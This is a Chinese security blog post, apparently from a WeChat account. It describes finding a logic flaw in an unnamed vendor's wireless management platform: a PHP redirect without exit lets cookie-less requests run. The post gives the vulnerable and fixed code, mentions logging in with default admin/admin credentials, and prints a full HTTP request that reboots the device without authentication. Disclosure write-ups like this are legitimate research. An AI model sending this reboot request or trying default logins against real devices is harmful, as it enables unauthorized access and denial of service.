点击「蓝色」字体关注我们!
用鹰图语法找了波网络设备的相关词汇
然后找到了个智能无线管理平台
通过祖传弱口令admin admin进入
之后就是测试相应功能点,最终没有找到有SQL注入的参数和RCE的地方
不过这里确定归属是来到系统管理
是这家公司开发的
对证书再见吧,不够5000万
在无限重复黑盒测试抓包测功能点的过程中,来到功能池
随便调节一下,点击应用,Burp进行抓包
该逻辑漏洞在于我删除Cookie后,如上图是有Cookie时应用后正常success表示应用成功
删除Cookie后,发现正常执行相应功能并回显success(虽然代码鉴权到了,并跳转index.php用户认证处,但没有阻止代码继续往下跑)
造成这个漏洞成因可以模拟出相应白盒代码:
if
(!
isset
($_COOKIE[
'PHPSESSID'
])) {
header(
"Location: index.php"
);
}
// 后续的代码继续执行
echo
"Welcome to the success page!"
;
// 虽然跳转到index.php,但是echo也会继续执行
修复代码如下:
if
(!
isset
($_COOKIE[
'PHPSESSID'
])) {
header(
"Location: index.php"
);
exit
;
//增加exit修复继续执行
}
// 后续的代码继续执行
echo
"Welcome to the success page!"
;
// 虽然跳转到index.php,但是echo也会继续执行
利用该逻辑漏洞,找到个设备重启功能和恢复出厂商功能,从而变成影响很大的前台拒绝服务漏洞
拒绝服务POC如下:
POST
/ac_reboot.php?action=submit
HTTP/1.1
Host
: ***********
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Content-Type
: multipart/form-data; boundary=---------------------------27648818302819120642279485210
Content-Length
: 62
Origin
: http://***************
Connection
: close
Referer
: http://***********:**/ac_reboot.php
Upgrade-Insecure-Requests
: 1
-----------------------------27648818302819120642279485210--
总结:
挖漏洞要细心,并思考漏洞的成因
原文始发于微信公众号(PwnPigPig):cnvd通用型漏洞挖掘思路-从逻辑漏洞到拒绝服务漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论